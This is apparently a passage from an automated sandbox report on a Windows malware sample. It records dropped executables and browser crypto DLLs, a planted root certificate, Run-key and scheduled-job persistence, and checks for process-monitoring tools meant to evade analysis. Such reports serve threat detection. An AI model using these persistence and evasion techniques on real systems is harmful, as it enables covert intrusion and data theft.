Source: random[1].exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Jump to dropped file

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\PharmaciesDetection[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\ead6a72944.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass

Creates job files (autostart)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
